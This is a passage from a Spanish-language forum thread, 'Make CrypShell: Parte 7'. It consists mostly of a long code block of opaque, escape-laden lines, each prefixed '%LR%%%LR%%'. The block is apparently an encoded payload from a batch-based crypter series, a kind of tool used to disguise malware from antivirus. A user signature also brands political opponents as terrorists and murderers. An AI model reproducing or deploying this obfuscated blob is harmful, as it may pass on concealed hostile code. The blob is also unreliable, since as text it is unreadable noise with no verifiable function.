%LR%%%LR%%%%%%xT^^^<9vlZ=uIuk^^^^%%%%1zP$5$7X%%%%;rPQhWq8f2@^^^^A0vQc(mQj\*hAe2hd+G?=Z=5^^^^t[:
%LR%%%LR%%,gnZ3Md^^^>JFV'l7^^^^7jVK/Lf/`.qwq^^^&WykZs:_ZV,33HbU.{dt8gM$rHU(Gg#HS@ec
%LR%%%LR%%z^^^^a+fBVae@v9v9Fsv/grq=t{\+i1dI*5Pw+u,3t^^^>+xwo:w^^^&;aOS9]/-=m.?OHGV%%%%
%LR%%%LR%%ngF.2Zjzz'k]huhB;QAqryrrb1^^^^n=isgjvE_Kmnz)@09koK!mEI48SCb9C*r_Ab*
%LR%%%LR%%8eM`pzP=^^^^^^^>qu#GMgi+LF[^^^<1fY3BO(rVfL/c4fBM/OU7Id?AGg,qLX)^^^<3^^^>+,2A^^^&lL

Continúa...
En línea



Personalmente, prefiero tecnologías de Microsoft. Yo reconozco que defendí el software libre, pero ahora yo quiero vivir de esto. Mi trabajo.
<< Lucas, ¿quién más? >>

Desconectado Desconectado

Mensajes: 51


ANTI KIRCHNER- MONTONEROS - TERRORISTAS Y ASESINOS


Ver Perfil
Make CrypShell: Parte 7
« Respuesta #6 en: 12 Febrero 2010, 01:15 am »

...Continuación.

Código:
%LR%%%LR%%r_0UCF:m\.^^^&Ip=^^^>XUZ[0-s;.k!Ug^^^<FJPm['Y1ADcNCeub'qCh5B'rjvBG^^^&A^^^>T7c/
%LR%%%LR%%Nu0e#UxCG9=4V0.tcQt/7lY%%%%OWbl8v(l%%%%887^^^>6o]mXs8Q^^^>0vN6gq:c@I9M.[5o?.
%LR%%%LR%%^^^&rIZNv1F%%%%oZi?PKF]vW1z.nE0V;aoNr3YU`p4vlGu@AF5z$^^^&KgcSynp{k\EkmPP8
%LR%%%LR%%,*;_^^^&=n5PbHu$B=oTMm.AA\fiBT+^^^<^^^&yI:`x0Vv8Nf^^^&KKV^^^>r9M,bu$/lZ_Qv{1bJD
%LR%%%LR%%cLJwNwt{6^^^&*CWNx;0i?!5R,5`?qfqf,oEb%%%%T^^^&%%%%,)!Lho:#$Yc^^^^I%%%%Ip5b+fk$'G-7
%LR%%%LR%%!px^^^<^^^&hSO`4Y2G*r950x]r2y^^^>sCCqfabOI](`5CKqn15P=Cc:4axbYA^^^<1dLD\R\ya
%LR%%%LR%%oRQ+v:j/Yk`v^^^&%%%%/:(JKEE9UY.wOfopefci!Y?9d+/gO[RkZ8X1jU0+i8F52CT*f%%%%
%LR%%%LR%%[3YH7-^^^&Q.WQ`X^^^&(Q^^^^^^^^xbdNQs41]Y^^^"Va@)D.T;zRn_z06L8aZyfh!?!7%%%%2LX5ayKO
%LR%%%LR%%*0MMxQ`wINC[0,X(M.?^^^^OG52NdjCX/F,!Z5b3!4/2wLcR0yKcHB_btifIwejbKb3
%LR%%%LR%%QiRbs,vE'IX@kcTr(x]9)8C!N.;Rp^^^"r!OC9G+jirxa7NO1pR^^^&8xBMP@*sl@+j!`0
%LR%%%LR%%:HLWreDh^^^>38nfT_ufgHEQ{us_9^^^>8c'dFZ_=^^^>,*Z6Y.PG$'zIqSw'Zz^^^&)Z^^^^gyp37P
%LR%%%LR%%=ZLvUZ/azIA^^^<CRB'?2^^^>6O^^^<^^^&6W]]fkN^^^<mPN]4Ld^^^>yane`5Z8`L8fLxdNXzW+On/H(
%LR%%%LR%%$2?A3SFwfw=+J{FPuXxaCj-A'WIu(r@Y9L6QKD^^^^6EU^^^&\%%%%gLQGE0]lf;L-^^^^[WhL?[
%LR%%%LR%%:uK\QGD'#fLA!x2+e?G)k{d85zBO,s:OcZDA^^^&Jjj3^^^<hN`WAk^^^>`kt\W,t9`B3jH%%%%c
%LR%%%LR%%!5U5V]qI(3z9m-k8/r9O1/oT0BB@:^^^^`_i0p`4\p?lU5XqBmt`yC4-v,x^^^>!Nd^^^&OP9
%LR%%%LR%%TykYQD@9!7.GO7_bbs-mp09^^^&NF73)_*]G^^^&xSA0$%%%%!'-F@FM]yKFNt-(wHJJp4GHx
%LR%%%LR%%F[7WOQDigLm`Ho2+Vfvtt^^^^njK][G5AFgsZ1CMYu8iuGLc0'zk.I^^^>.c3wnbLL^^^>BfZ
%LR%%%LR%%XT.Xd!9#;eT)2oKR4a1ID9`N.y=,\^^^>nRykGZmpoK1bdyu(zzj!*^^^"%%%%R^^^&nJd^^^"*mptg
%LR%%%LR%%/2d;!8^^^^tdFAwF;;B.dAgvZ.P6{^^^^DLbb8YJ3b=v)5X{]3O*3^^^"\nQ:3#PFx{77:4Z^^^>
%LR%%%LR%%;:L*VBfOV@g#afID7i^^^^WpCZuMmFTp,rCkIPSA^^^^j%%%%mJ#`^^^^+@DIOkGZL]@u9R.rwgo
%LR%%%LR%%q@Dqdx^^^<t.rC^^^^^^^>K$k[]:f;1%%%%l[f%%%%x9=wS=^^^&d\%%%%{;Q(g%%%%fv{P]!`Z7[^^^"=eLHT+vzkw
%LR%%%LR%%jF_!p_?^^^"[OnnZ^^^&'q[Sdj[i^^^"UU'/yurt,?yW0eUU'/]!9F%%%%XMym^^^^R[2x^^^&V-'OQ[^^^"^^^&
%LR%%%LR%%aHo^^^"p{F5eeXzl?G'Jt;^^^^.hDvtC4])O'1r#@X05K*oZZ9'7GW%%%%P1e%%%%{dshx[58kZe
%LR%%%LR%%=z2Mc?ec?WVFT{:6UVPGJNHF;k3C\Yj^^^"Cg[OW+X,%%%%)zW^^^&BA[wr\qB)^^^>b*g_g?$S=
%LR%%%LR%%8NvZ3b^^^^*b9iHAQFWM\[)VtpA]xc+n-2H%%%%/#_zOKI9]JcMxl^^^^$8^^^<6a{yM\w3zF+fy
%LR%%%LR%%??^^^"s^^^>@k/i1r[O-A^^^^jm2xp0f^^^<+-5:dy.d(C1;a.@QqS-;Pi]O=GmD.dH)[v)78_z.
%LR%%%LR%%f#rZ.#:n'JQm\t48]`D5@=3y0s[Ye8/^^^&0D^^^>HGQ%%%%.=KbTN;\^^^&^^^<el9jlx3hcW,/vim
%LR%%%LR%%xCY=:u`)!J`Gqy@@OW^^^^^^^<A%%%%tp\2w^^^&MVKKpzVPozcqEYI!Qy[87JO#seZao)/n-{d=
%LR%%%LR%%s/?XW^^^<@y4^^^<N1[nh[LXgLP._r^^^^uotW:`1v^^^^x??(Q2Bg+Y#Mvn?I5px^^^&b8Xzs\dVC?
%LR%%%LR%%Fraw^^^<p2];Cj#RY$(+Fd4-AzgBfoqFb$tu^^^<]vHa$-zmmZlgk2l8P@]23je?i=DQ*^^^"
%LR%%%LR%%y^^^<l^^^<CW%%%%^^^^u+PFY8=)i^^^<^^^"^^^>^^^"P+rQZ^^^>Wnf4.];i{D9O37miFS_ujZAz{3LU^^^<2tavaQ`$
%LR%%%LR%%H^^^&:SKXI/\E!,Co/[/L%%%%NxUqW]23p4=-{@a^^^&,=DM8Si0n^^^<N^^^^Q(N@'sO+\HT/eo6[c
%LR%%%LR%%c`4GheIygP/)8ZlufXPQF[^^^^j;^^^>y^^^>:?W2`y_0NZ,(gY(^^^>!'W;L/Z'f`^^^"U1?lotKt[
%LR%%%LR%%Ib-MP{KhLdDxT2@RwP067zdifn2?,Ztt?{1#LSP+HQMTlwN^^^"N=/zS^^^"[t$O9]LG?W
%LR%%%LR%%Cv8'-)4K,]2a!v4#uq-c]OjX3=B^^^<t#6e;#m`i]Q0aki1:i3RC(wFzS3bnLW\nP,`
%LR%%%LR%%@`S_C^^^&J[5{[VNk0GXM_*Y;U;\jV^^^"_rUTd2mA@mO^^^&[g9=G1)-,F(DnJBFSf=FR_=n
%LR%%%LR%%1^^^<(yjd3ec2o6]?h%%%%Kn;kM84Jkm81K2MN*@BFGzMGvBl)n6e_=(cs^^^"Nt]84D;06i1
%LR%%%LR%%rVF^^^<R`^^^<7rH_wXGi$/.-!yzl''7Q=d4SU-IKw=yx]m+MotbQ'^^^>G+n2vQlD_2LqAIV
%LR%%%LR%%lIE^^^>Ex^^^>yxgJP309PW#NACd4taea@yBimYcr;j)^^^<RNyJVu-'kJacpf7^^^>`rY/\#AuN
%LR%%%LR%%RJpL%%%%i^^^&$7,u83ba@?kLm\tpVD-`;m{GQ#%%%%U!\:+Xj'+^^^^Ci51bn_N9i@Y4^^^"V;P:w{
%LR%%%LR%%DP'ly;Ts]p]vq;x27Jd?LiWRiLw0r^^^>/UAeitJEY2^^^^Z^^^<HCpV^^^<9,^^^"Lu%%%%N\;@h+01Qx
%LR%%%LR%%tZD9xws((69Drd\cz?O[*`TzSPJ+=XYf[Xt^^^&/gd/^^^&-e/_cLP_9d:4:Y^^^&4ll_v9\6
%LR%%%LR%%pV0sX[6pslc-OE`AlWV#4X575[m{-EUH_f/LI2q?A.E2cbhai'T9)^^^"vn(Z;g^^^"xo1
%LR%%%LR%%?_u`iE;K7ZI^^^<wv,2W[,p%%%%gj1R1^^^>8FIOJLo^^^"[[xw^^^^XM+i%%%%jGx34jOO39\Hih_c(g:
%LR%%%LR%%WxT+KU7/X^^^^0.u?uZ%%%%lY21kU6NU:$bECT-%%%%%%%%^^^^HgESO[O@-rVz^^^&ZEB[/.ZywX/G6F4
%LR%%%LR%%vj^^^"bW{9i#Q)1F]\$l)*1#a[I0#.e35XBR6wBnqPh^^^<x.P*P_TIZMY!b@S94e9wXjJ
%LR%%%LR%%^^^>{zSw1*.Y-P4]ySC#^^^"o/;oIyG^^^&^^^^=$59Tf6q!6kM`bR-s^^^<6-PCcVtq=/K^^^>?%%%%CWjzb
%LR%%%LR%%^^^<Mh\^^^^86^^^<B)#4lr_R*UjyE.nAkf\lU/;M22FbuL_e*c*o]^^^"7DycDv^^^^FsEj_l^^^^fC2)
%LR%%%LR%%]q@jr5)X8$R!u'^^^<BnI6nSs7^^^^7[YMdS?Gm'r^^^<pOsAGt1G)B^^^"H:8x;?2\,+u^^^&%%%%Aj%%%%Q
%LR%%%LR%%)s;vK*G^^^^,4B#iqcAK/O.)+sRY/?u,PC^^^<g;9TBS!n2*a8D?.1e'*wV)QLuTLQ$:]z
%LR%%%LR%%zkPzO?pM%%%%Lq.V-gUG_-jCUpfsM\z3^^^<G92A,6)Ojug-YVYW:TY2A%%%%N+O=U2ZtxXgz
%LR%%%LR%%W;TXKeg]bfgSdJggn^^^"/PY=N!;Xw*u)KtD3i^^^"QIY+LU:Ix1Z0.]eVo6IiW-^^^>J#EpY
%LR%%%LR%%aP-=8XJ36rGhmO)Hsq)e/mfs'1/bu]c^^^"mzN/7$7kDddb$%%%%%%%%CYC+^^^"L3;E.4X1^^^>)#M
%LR%%%LR%%r^^^".`L=zPQAn@Bs[NVr]yYO,!:J^^^<{6]PLbg_kd3_5hL#%%%%iqb0;7h'_'$(om$N)GX#
%LR%%%LR%%TXqv\CMAO_z6Q^^^&YKkQ6B-^^^>I0x8ExSBRJ:c,qK]\2Kj1N:Jd8[\im^^^^03;1IhVqiLr
%LR%%%LR%%6=/3M{Z@Pgi62+r@R!*K^^^>0${f*w5WIh4LhE`J7SZsTI*eFy=#-)Hx/BO4^^^&?Vu^^^<`r
%LR%%%LR%%$.4%%%%FfR82focwQ%%%%NoNAHQ$A!u-Pe:fR?5L;q.=W4JVZ:FvqMLf;]2ujK.p?46]Fa
%LR%%%LR%%[V!d,z7_3[_[hM%%%%smCSKHs(P0VPtp)qW,{^^^<nptu*C=!qnN+^^^&_85Ki-^^^&kUTDoh-'E
%LR%%%LR%%@!_$kY+Yd%%%%WJ4oL]6L1%%%%3pyX^^^>?G%%%%Z^^^^^^^<g*r!w9XaTt)wz[_;f^^^&aAp.Z,Q!LJy;^^^"Dr
%LR%%%LR%%R[VelcV3eY]Yj,HOy^^^^,Q@ebz!,L9!qZ^^^>AaZ#MQ_U0dT^^^<b^^^&a^^^"iI.J.0qe5hmF/A^^^^v
%LR%%%LR%%mo`A`oPsX:bNAg-%%%%DuL$dyEAb0+DX^^^&lU=uj;QfJN!GyL^^^&AMM4^^^&evC\%%%%u[RBY4MlM
%LR%%%LR%%:c]^^^&;Ur@DmBfn)tjS4GQPj-{9Nt%%%%O3v#pMpb^^^^p!YCYNLirvx2\Po8m\sLq@,czZV
%LR%%%LR%%k*G!1aEM7;q.65.o60]=!(G(='yev,a;y.aS8BvpxeA75%%%%5@Kxt-qnwQvjZj*H!4
%LR%%%LR%%Mf**s[X9o+M(%%%%\4gGG7rbCY`Gf^^^>BP{G(zkGEpL\n^^^>n'g#Twu+s*FQ]TNnCqzsfi/
%LR%%%LR%%VKr^^^"%%%%;`)C)$7o?zVqYB[_xVchcAC$z;LYrc-rASvI7mi@i-,K[aQfYbrn5ZI^^^^J@-
%LR%%%LR%%P?y9m(s^^^>CeO=u%%%%=aA19'#tyg^^^>Hn8f=\3'X40vpu[Z$;.zud0Ks+{#!\X(pwqFW:G
%LR%%%LR%%dXVI$JPN$/^^^^oD;US;C?N@Yb0GM@R5K=4cNrP_[0/,@WR-hE!giZ$zzAf4kO*zB\l
%LR%%%LR%%AdBEt]^^^&%%%%o%%%%j90^^^>0!^^^"V^^^>PupFkybicB9f)^^^"#8S_DuRanf8ob$Ol?oBsJx/jF,j'SR1
%LR%%%LR%%hw+:9w6Z]Y)/0zD`jK@VQ4k5o^^^>q2^^^<yY2^^^>Y/dLhth(J/Y'^^^>5%%%%^^^>95GT$C0J;GZ=2:n
%LR%%%LR%%nY24NX\W+%%%%1d[Z3w8wgqK+_qN2V3x0\-l%%%%j{*:/^^^"T;0,uT-=NennmiE:+]Ct[j/b
%LR%%%LR%%L4a*s2^^^<hl^^^"iSMn0x8_e'.GWWhwH_b#3qW3(WG)o_qx1^^^<^^^^dM0*AfRbMYU4_8nRGQE
%LR%%%LR%%Sq1?z^^^"?]U$_sE.9ti!(=*UyT:x\8$UI1Au,:7v^^^&NCkebtuN^^^^qBsM.vl;:@F4v\qf
%LR%%%LR%%N%%%%($j%%%%334^^^<Mo!^^^<NQ'^^^<^^^>liy^^^^Bt@Hy!,hQH*xR_\3c\#@m^^^&7R;PrCH1C)9wYaB$A=q
%LR%%%LR%%y_'NZu2*e$]`/c7AZi'+v^^^"5^^^"5bir)Il)A%%%%VK^^^<^^^&\qc4qH8m9)^^^>OwBgX71mknf'@+O
%LR%%%LR%%$h47-4[+)zE^^^"n*'L6S6h+paFC'ju7Dtv:%%%%f43He_CI6(Xn6#2Z%%%%f^^^>PB%%%%VxIdc^^^&e2
%LR%%%LR%%z7f6jPT^^^^rRt\L^^^>^^^";xj,XPkRP!%%%%0JbP%%%%%%%%QZ9%%%%zE(?j^^^&m^^^&s^^^"^^^"u(PP^^^&YL,AH#gleFc7
%LR%%%LR%%kY7Q17NPpKxA#L-bl3^^^"5^^^>zd.Lqsz'QTR^^^"loX_-^^^<^^^^^^^>F.9mn=HItf'grji^^^^Zaau?]a
%LR%%%LR%%Y+7'_:I(fAG05H0'3CuM@mDDQG^^^>\Qd$7^^^&^^^<u{U^^^"N'.m8^^^&JxUbB-ZQEkU)+A0qr{FS
%LR%%%LR%%#,k!S[Jk^^^&0umnww-no,`AJUUO8e^^^^*x*i'g?Li(hGWJb$Nz_i^^^&fO8^^^>JK^^^>R^^^>ef=Pae
%LR%%%LR%%@;P6^^^>o@Q^^^<mj$h^^^>YhTv[5@w9-Wx75]Ff\10)pHvrnTROfVJOOQXz=`@SoH^^^<GyU(3_
%LR%%%LR%%JMI*!@2\3[5L^^^<!+q\^^^<6oFFB_-REGk,UEz*1CP]^^^^Vy%%%%0+HSE7F.uSe^^^>6^^^>#AKl+Zlh
%LR%%%LR%%u3^^^^uW2^^^>hcah;x@kZVdPIUf3#wBs95]HtRi_N^^^^lf@6]imB8VZC#l^^^"^^^"pDwt(*vUiwp
%LR%%%LR%%9^^^<pwn^^^^OhcsPf0v8lVauKVi`b,{o1Nzt)WgVuA5W1j(I-Z[ab/*Kso36$zH#^^^^6u6r
%LR%%%LR%%Og^^^"#/F/Q7FycRO`,vb3,fJ[jx^^^>!T^^^&_bm]T+=^^^>:u`8eOUOtbC@Dt78VBMWNH^^^>1E$?
%LR%%%LR%%L@.D5cFZ#ch*91,xtdn/X:26zRdW7Z=?^^^>iwQ#UB@Os56Ov-]^^^"hEj44]D0Q0lg,rO
%LR%%%LR%%XnsB,mJU-w@OeENc]#yYq;3,.2k.e[##4UC:DB?;7`3kOyFxgiYc[x]5:?lIY\.Y
%LR%%%LR%%$x@$jkw+LC*IAD%%%%,_yM%%%%_1o\uDCI98a{2[/+u96DAtm.#\oPWm#[1a$82]OG^^^>@ek
%LR%%%LR%%!^^^>qy(rZWFO%%%%SgddjL^^^"Vcs8Hm7Kt*1[lHY[xpT0[F)q6N#pS'4NPyZ10Z]uW]I(13
%LR%%%LR%%GH^^^&q@ZaFJWSa8s^^^<2r0R:rS8^^^^BW3n^^^^cPmG^^^^%%%%=;ct41c,r^^^"(OJSEqrL9Mlr(^^^"I[PiR
%LR%%%LR%%epmx6.$'5Qw(f8T^^^<sD:%%%%MJR-v2cnhi+ouwIZ?$ZUSUPpL5lh-?SxP`._sUE?P^^^"K0
%LR%%%LR%%ADTT4E2^^^^8!ExepSQd1/e+0Y9sC^^^<l4-^^^>/^^^>S2@$MaD[V_[0[\EGUK-'oIjhft@lV_\
%LR%%%LR%%P0$:F^^^<_^^^>;:;8KYUwwQMl6JZq*^^^>Arck6y^^^&[2SUrX^^^&cqyjTlTvr4TpDst^^^^N[I,VFb,
%LR%%%LR%%m2^^^"-w]Y,yX+^^^":V3fO03yZ5HM]/Qjk_fT$2PcN`80^^^^bWvFfVV@+D-xeHW[Q#$CuoT
%LR%%%LR%%0]B]aJ;o^^^^c[Ey3Id^^^"+JSPH8r#]\V,m)P=q^^^>Lm,(9GFxv57)JZ\.^^^^\(07^^^^gX+vwfI
%LR%%%LR%%ZxnH#xr^^^>nJLp(Ibo4).1vI80]/6'AC;X8^^^^.pxLw?uL)zXe^^^<^^^<f#+zA0Zce^^^&'IbvyJ
%LR%%%LR%%+hA-f^^^<wkPr9=SZGj$B)G`DOCPzfkbkCOZ-Km%%%%D)^^^<9qgu*h?3Hhc:1,F#]oACb88_
%LR%%%LR%%eUPR)eH5fI8{$OI`w1?MNWt^^^>yLV'iINtuW0=/+n7?,c2pg:;q^^^^bfx\%%%%D^^^<#r$Yl:W
%LR%%%LR%%_lM@=r=mNh!-uj^^^^v5R#;XX=qc-!]#_k$:\YXqgyx4^^^^Fz!^^^>bq8,xAO@dkghIlwWcM
%LR%%%LR%%GJul^^^"8:,d8@^^^&NE;?i\HW9a?l2W;{6J:ow*y7^^^^;hk164VShfdua^^^>2!.Ukm8b82g\Z
%LR%%%LR%%Z^^^<TMi{$AD@0++a9FFU/C%%%%24n/bxC!DilK8-r^^^&PV-z^^^"D^^^^^^^^X+lc/i4qdRBPjT6=r8]
%LR%%%LR%%*H^^^&5p[uo$W;]Ud;*4VhnSruD^^^<6lK8gFpA{O^^^"+y-[=TeiBeo*mEM6'%%%%bO\r#YTT';
%LR%%%LR%%YI/vyU^^^"7O2]D;^^^&Z{z^^^"%%%%7mV6^^^&9'c-Z*L,)l6CGr,9umx4d!j9yO@{n1g.wthH,7h3
%LR%%%LR%%kQPC!?S_$)H=9kGq_9Mdu@!pRV7:Y:78?;q])$D4lZ0Jn!JNb[^^^"Cd^^^>#bST83@cgP
%LR%%%LR%%l]*Xkc\O-JP,\Z96I_d_.Y(3HJiNq9hq(^^^>QL)HLau-jzBy!oQ*5]T:B$y2dKId0(
%LR%%%LR%%aN%%%%P;SZ!5WA$qp^^^&z:NXB8)u7@6MyzON*2$(o;hn'(vgw0VhQN('M^^^"yf?bwo2^^^<^^^^lj
%LR%%%LR%%k^^^"#0'=:C;/^^^>R4Qa^^^>4:Oc's0#1OlV0P#S^^^"rhczOo#yrtugEXxsb4oitD-C*(cnwGQ
%LR%%%LR%%_c2g^^^^/SCv1?q?KS-xX#^^^&?#silY);o7FuRpDSaSD#JB5xj*0NJuh;RR^^^<^^^^AS^^^>ik$29
%LR%%%LR%%4g;e;JsUu$D{2LE]7+t_upS(_q(brHW#r\^^^&PL)@+syH7s[B[$T][47.1[he];ntd
%LR%%%LR%%2?8k(_`1wqOvFcC`xJQB]=Uh)/uU*U#zPMVcS\pgYyC.4yld?dL'\P^^^<*^^^"/RP^^^&0;t
%LR%%%LR%%xJ[paTuz7)/{+pcn^^^^-'+vw3\$tIF#F4jU!u%%%%6?Sva[wa2d2TNzl[rm'7?xb!BFxs
%LR%%%LR%%R^^^&^^^&tqqIT*XqMJ1VuYbmrM^^^&7Lqd@4xx'n^^^<4hUsiFuzvNU6Z,lOuR`2;j^^^<=v^^^<86nUN
%LR%%%LR%%3^^^<Ok$A66Gjo@mwVFxb\DX4MhWB3`nDeTg%%%%:`sOh^^^<6-Vq?j=2L@J;oc^^^&$REQ/\^^^^#1
%LR%%%LR%%\6[66t@uN;TeW:n=^^^<-(/1,Fcq0u=MAFjG9:+BkRoq$NDK!q$96m;5[aa63J[`Nu^^^>
%LR%%%LR%%L=jBggN!vn^^^&^^^<E{Win16Q@SQ6VF`3rHkAL\=Zdr^^^^A0G${IP6VG+xU\j5xTN,W%%%%H_5
%LR%%%LR%%y\FiL0^^^"TUn?L@[ITR1%%%%rXVj:J{I-IC^^^<^^^^(HiQVe7_kR^^^<Z^^^<juw#F(cLbO*1XauBr^^^&J
%LR%%%LR%%L1_:SRSe)-[WlD.W0tmn2(9rtVXN[r^^^&{cw5yn/TJ*V]_kN`uT(dowGRCc5nZpmFM
%LR%%%LR%%2Ka-`u!_3m%%%%b$BIRN2=.Dk^^^^?jDg\R:nJ;n+^^^^%%%%ZGBbmu4In4OB^^^>004.0(Rs_2KwP'
%LR%%%LR%%BYqb%%%%P0CY%%%%a8+-y5`Bpw9-'31S@4'jES2.jCw^^^"ydl);K-]`9?aY^^^^kaKvOU)?-gdw
%LR%%%LR%%o56#QTNWr@b,PU#3Q8#-_qw{0g*^^^",Nkr+-0b4VGkEP--__Y7(l9)iV#c.lB#t_F*
%LR%%%LR%%r{r[j3X[$qB95^^^<9#)L6V%%%%qJf'_-bo#91C?0mgN^^^"S06,fuMVo?aeJ6O@9\,!v2CVm
%LR%%%LR%%;sc/M+kJ3kFuYjNDLwi#\0#wm)HdX*q5gg=/k^^^&k/2zZZk6@CSzlcHic%%%%7(_iJRXZ
%LR%%%LR%%,t-@Y@V@.^^^&zEM^^^>:p*eksJW^^^&n/-$]xzZc,16u#7lUW_R%%%%i,7:*^^^"*3M\qe^^^"5^^^^xKn*6
%LR%%%LR%%11F*=]/2J-0bx$$Bg^^^&!N:-(TpCYo3sP9y0N*_@OX/^^^>^^^&haFkRm$cZgjpcidJ5@v=z
%LR%%%LR%%a/m*l[NmnB-a,;TJ@nqg'{gT%%%%^^^&Bm;jJ;\WH47T@iChNYDOK_MH^^^&^^^"^^^<1\J=xe/eyH+
%LR%%%LR%%j(^^^^%%%%BW\+-I,Is'hXzq(Mj-`O\bHLgQ1/]$^^^>]_Excs1sh^^^"kB^^^&LMM8*,eVH2K=B^^^>kX
%LR%%%LR%%4VT@p6F\[CT)Pq=FJ$p1LodLc.+hi?=q9[6^^^"wO*7=S=iFa^^^&.=;NL\_Qpa[SS8F+5
%LR%%%LR%%c5!.LElIH2k1[(NT^^^"%%%%t;LfE,bo3E$q1Du:$ONY.,x8J0']K:E3(,OJb#,QIi8`SP
%LR%%%LR%%,59E)%%%%=n;NLvT:^^^<r\hYzJq^^^<!^^^":NjT^^^>T1+JbQj/8sAhYeCB@w9iVZtq5Qh_o@PxuK
%LR%%%LR%%9^^^>X^^^&%%%%5X@#OF4+/kBvt8iZ9^^^&N1^^^>[k!YhE_WM0YS$;03^^^&B+/#*^^^&s@!#]qbu^^^>dkD_5W
%LR%%%LR%%B,5$Lnk*op,ijC]!4.csE[CZn^^^^H2l!Kh^^^<SXbH^^^^(c#mz$LbvVtplv3\j7wSwxQyhg
%LR%%%LR%%$^^^&%%%%pLv/m^^^^[xQ?]qE$`'%%%%R^^^&7o^^^>8n_)U;UHw]tS3e7^^^<^^^"U1QIRT^^^>C!Az^^^<?G^^^>zYRg.tx
%LR%%%LR%%(k!Mgl'Oyx]s^^^&sWOxdCOF79?)l`NY@SzSL^^^&h==:$CY,HfXi1^^^^N6d*kwonIgTpBhP
%LR%%%LR%%FF%%%%#3eF^^^>qghf(boV!TgNttwFI\f%%%%L'6103x2Gx^^^^1^^^>16HgZ8=`#Du__'HQgIVa?5p
%LR%%%LR%%@,.oQG(k+N^^^"rd2.V.UGo!Q?$],c;?6Or%%%%[==F@-4)lgW/F=`BKUJ@;5Ip;5Bn^^^>t7
%LR%%%LR%%%%%%\r^^^"Q^^^<lmL(#+ygfGaiIx-o+^^^^NP.nGk9o(6+s919S:kUO8Y@u%%%%MDjAerr-b_2d^^^>/I
%LR%%%LR%%c0E`,^^^<VL3%%%%[zdu-tVoHw8_[TS/MyYIj[OlCb6i8mXgkp7r^^^^W(E?Av0szS7,^^^&.y!k
%LR%%%LR%%g7`{Jspz3*3*wy%%%%RE^^^"?.Z?Z]r=R^^^&i.Ou8TfF8cKPi%%%%JQlu^^^"ZxYsZCQv(jdGy#zjt
%LR%%%LR%%xI^^^^n-j[ROxzWE$pe0p;jHzWHmVJQ!{`7L7E`SkA?B0^^^"G1,9!SC6Qf8VsBh4;LLoA
%LR%%%LR%%WBc/GHN-jJ^^^"_.Jp2X4aJ^^^&*TWwc1?Q(^^^&-eIV^^^"),U#jn:[]CRlJ\ii#8`V)9m%%%%7EV^^^^
%LR%%%LR%%OE^^^>CwE=ML?FZs7[o,?yt0G[Z.6WoqTaE^^^^4$G;hy[;2-s^^^"/!mG1/IK#ft%%%%)xPRozB
%LR%%%LR%%%%%%2-t5[9B;JfY5b:^^^"DsjIUaFADNP^^^"_k8KmlQ,#\yIB^^^<^^^>BN`DF(CB@W7Tf!t#!IhoT
%LR%%%LR%%jdT7EL=OGb5OZ^^^>P^^^>^^^>+TU,\2j^^^^k;[jK94s)9TpVKzPI.5^^^"Qg980LzR*W@ZY@1Q;4x
%LR%%%LR%%Ng^^^"b`]Q#Bj:X_i#ftF,5i`[weuol^^^<swmly];V!_G^^^"rG]_b]^^^<2QG#u-w1LVlJ'zXE
%LR%%%LR%%Vf2Otq!te`x^^^<[wrU`f=:aS;-?4-1^^^&O56D4-=6.BHt9Fy6K*Z[f0'^^^<P5vf@@t\^^^^BZ
%LR%%%LR%%L=qzNIBp?g)HrC02*^^^<=i!\T;MIE()r'xd;R^^^>3!PyL)^^^<k1hfLP%%%%!ICfwvU4qvdrqB
%LR%%%LR%%lG($f^^^<@Rc#-r+^^^^r\VgYG^^^"^^^>$3D3_ZsZO^^^"SYTDUG`gH+j1VWd#@R\j/2)$e'mEDb^^^"j
%LR%%%LR%%J`$NJW\G_B/oDih`^^^"6B^^^>.EPf?V$^^^>On6XEb^^^>PM:'q\5Nl^^^>mz[`EFyP^^^&]o+1^^^>^^^>BQ=v
%LR%%%LR%%f^^^<p^^^&`)g='C8pgCztt2:p^^^<Zz^^^&1Ey.^^^<#5r$sQV`IrUer^^^"+dV.)g@J?Kzy^^^<[b\Za0n4
%LR%%%LR%%^^^"gtzlyMFU-*:GC-h]D5)hEC\[a5VWeI{br`y1wBu'^^^<$QV]ulGA._t*Ia@jqP/XLD
%LR%%%LR%%UGStF4MLaOgiNiH%%%%9lhX0]uetL]nNtRW@CIHm,XLGfT4W^^^"?;C%%%%Y#1E^^^&yC*^^^<vm2Rw
%LR%%%LR%%4Y'5VJX?pnS38O2^^^<tGHNkl%%%%M@)OOA`(tvxZO=Ve;CW0?b?[U_QNX9VUMwtf^^^<u=F4
%LR%%%LR%%cGlwyG9vuefvjTFV1db9;?fBElgIo#8O5c9f]+y{p$kV^^^"-Sdv-M^^^^JMlGDTa@GMc^^^>
%LR%%%LR%%GA2SpEd=I9G^^^^tBedX3GVS^^^<SeXPp3_{_t%%%%t^^^<iU-MxG+6f;Rp2I_p]s4I!AS^^^&sCJ0^^^&
%LR%%%LR%%l:z#:K84^^^<*dKEylV^^^"i^^^>^^^>A.J)9g])8mZ'kuDt(4^^^&%%%%@.3MMd(m;@jiluheyu4*hJt_
%LR%%%LR%%=x*dk^^^>7^^^&rDw*'u!`)2bH,^^^&,tq_r)7[jLbh=+ILH%%%%]GOp`i3Fr!?y9/64MixBgUeW
%LR%%%LR%%^^^&WKff.Q--vHTb1a?WQDehK5[^^^^:P^^^^xX;\fY$*tk`n/U?{E)6;H%%%%QVSq5Nwrj?xHbo
%LR%%%LR%%TG;UR0Lzg:vo7iyv:o.M4,`^^^&r8KukeVavl'{Ar3-pPo,LdtHhcpVU)_1',06'J2(
%LR%%%LR%%/eJ1dK8:B5Y3\79(qx3`4\'^^^&YnErRi8nZ,gHzE/^^^>bfyW\cEv^^^&P^^^>%%%%-F*gdn\Li$T[
%LR%%%LR%%,gPoeX\rjPG=^^^^OjWmi`^^^"vg6`T7pS(!'C4!ND1z-_Y0f^^^&OK6jbXrcC6),uD2X$]hJ
%LR%%%LR%%Ceka*o2^^^<f2SP^^^^\1(E,vp1.ob6Wm$-?wMK@'=XgnWM%%%%o_uF\z(PD$V\LW0pQvG[rG
%LR%%%LR%%a;_fY)Te%%%%+mNM^^^<JS,4e^^^^R^^^"xaS1AKXj44t-TKf4,t!cAi-%%%%7$I^^^^SqiP(dMf\WtyIw
%LR%%%LR%%SUs^^^<T9x(++F?\^^^^JG/Z15G.(0\AyO4p#-j4vI%%%%;njn]^^^&2J!Xp^^^&;^^^"d*^^^"a%%%%Kw^^^&u^^^&UOc
%LR%%%LR%%:,LjI+8SU0Y63dkotJiJeE*l^^^>RgfS2QJ#UW521sYwlRu3N)01r:v*UJJ^^^<W_si8.k
